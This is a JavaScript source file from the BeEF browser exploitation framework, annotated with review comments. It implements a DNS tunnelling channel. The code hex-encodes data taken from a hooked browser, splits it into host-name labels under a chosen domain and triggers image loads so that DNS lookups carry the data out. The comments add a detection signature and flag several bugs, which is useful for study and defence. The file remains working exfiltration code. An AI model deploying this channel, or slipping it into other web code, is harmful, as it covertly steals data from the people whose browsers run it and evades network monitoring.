GitHub Repository: beefproject/beef
Path: blob/master/core/main/client/net/dns.js
//
// Copyright (c) 2006-2025 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
 *
 * request object structure:
 * + msgId:    {Integer} Unique message ID for the request.
 * + domain:   {String} Remote domain to retrieve the data.
 * + wait:     {Integer} Wait time between requests (milliseconds) - NOT IMPLEMENTED
 * + callback: {Function} Callback function to receive the number of requests sent.
 * @namespace beef.net.dns
 */
beef.net.dns = {

    // NOTE(review): presumably the name of the handler this channel is associated
    // with; how the value is consumed is not visible in this file.
    handler: "dns",

    /**
     * Sends `data` out of the browser as a series of host names under `domain`.
     *
     * The data is hex-encoded, cut into segments of at most 63 characters, and one
     * image load is started per segment against a host name of the form
     *
     *     0xb3<msgId>.<seq>.<total>.<segment>.<domain>
     *
     * The HTTP(S) response is not used: each image is discarded on load and on
     * error alike, so presumably only the name lookup matters to the receiver.
     *
     * Detection note: resolver logs for this channel show runs of queries whose
     * first label starts with "0xb3", followed by two decimal labels (sequence
     * number and total) and a label of up to 63 upper-case hexadecimal characters.
     *
     * @param msgId    Message ID; concatenated directly after the "0xb3" marker in the first label.
     * @param data     String to transmit. NOTE(review): for an empty string chunk() returns null
     *                 and the later `segments.length` access throws a TypeError.
     * @param domain   Domain suffix appended to every generated host name.
     * @param callback Optional function; called synchronously with the number of queries
     *                 started, not once they have completed.
     */
    send: function(msgId, data, domain, callback) {

        // Hex-encodes every UTF-16 code unit of `str` in upper case. The digits are
        // not zero-padded, so a code unit below 0x10 yields one digit and one above
        // 0xFF yields three or four: the encoding is not fixed-width.
        // NOTE(review): `i` is never declared, so the loop writes an implicit global
        // (and would throw a ReferenceError in strict mode).
        var encode_data = function(str) {
            var result="";
            for(i=0;i<str.length;++i) {
                result+=str.charCodeAt(i).toString(16).toUpperCase();
            }
            return result;
        };

        // The encoder emits only 0-9 and A-F, which encodeURI leaves unchanged.
        var encodedData = encodeURI(encode_data(data));

        beef.debug(encodedData);
        beef.debug("_encodedData_ length: " + encodedData.length);

        // limitations to DNS according to RFC 1035:
        //  o Domain names must only consist of a-z, A-Z, 0-9, hyphen (-) and fullstop (.) characters
        //  o Domain names are limited to 255 characters in length (including dots)
        //  o The name space has a maximum depth of 127 levels (ie, maximum 127 subdomains)
        //  o Subdomains are limited to 63 characters in length (including the trailing dot)

        // DNS request structure:
        // COMMAND_ID.SEQ_NUM.SEQ_TOT.DATA.DOMAIN
        //max_length: 3.  3    .   3   . 63 . x
        // NOTE(review): the first label actually sent is the 4-character marker "0xb3"
        // followed by msgId, so it is longer than the 3 characters budgeted here.

        // only max_data_segment_length is currently used to split data into chunks. and only 1 chunk is used per request.
        // for optimal performance, use the following vars and use the whole available space (which needs changes server-side too)
        // reserved_seq_length and max_domain_length are computed but never read in this function.
        var reserved_seq_length = 3 + 3 + 3 + 3; // consider also 3 dots
        var max_domain_length = 255 - reserved_seq_length; //leave some space for sequence numbers
        var max_data_segment_length = 63; // by RFC

        beef.debug("max_data_segment_length: " + max_data_segment_length);

        // Detached <b> element that holds the Image objects; this function never
        // attaches it to the document.
        var dom = document.createElement('b');

        // Splits a string into pieces of at most n characters (default 100).
        // Returns null, not an empty array, when the string is empty.
        // NOTE(review): this extends the built-in String prototype on every call to
        // send(), so every string in the page gains a chunk() method.
        String.prototype.chunk = function(n) {
            if (typeof n=='undefined') n=100;
            return this.match(RegExp('.{1,'+n+'}','g'));
        };

        // Starts an image load whose host name is `query`. The image removes itself
        // from the holder element whether the load succeeds or fails.
        var sendQuery = function(query) {
            var img = new Image;
            //img.src = "http://"+query;
            img.src = beef.net.httpproto + "://" + query; // prevents issues with mixed content
            img.onload = function() { dom.removeChild(this); }
            img.onerror = function() { dom.removeChild(this); }
            dom.appendChild(img);

            //experimental
            //setTimeout(function(){dom.removeChild(img)},1000);
        };

        // One segment per query, each at most max_data_segment_length characters.
        var segments = encodedData.chunk(max_data_segment_length);

        var ident = "0xb3"; //see extensions/dns/dns.rb, useful to explicitly mark the DNS request as a tunnel request

        beef.debug(segments.length);

        // Sequence numbers are 1-based; every query also carries the segment total.
        for (var seq=1; seq<=segments.length; seq++) {
            sendQuery(ident + msgId + "." + seq + "." + segments.length + "." + segments[seq-1] + "." + domain);
        }

        // callback - returns the number of queries sent
        // (invoked immediately after the loads are started; completion is not awaited)
        if (!!callback) callback(segments.length);

    }

};

// NOTE(review): presumably registers this component with the BeEF client core;
// regCmp is defined elsewhere.
beef.regCmp('beef.net.dns');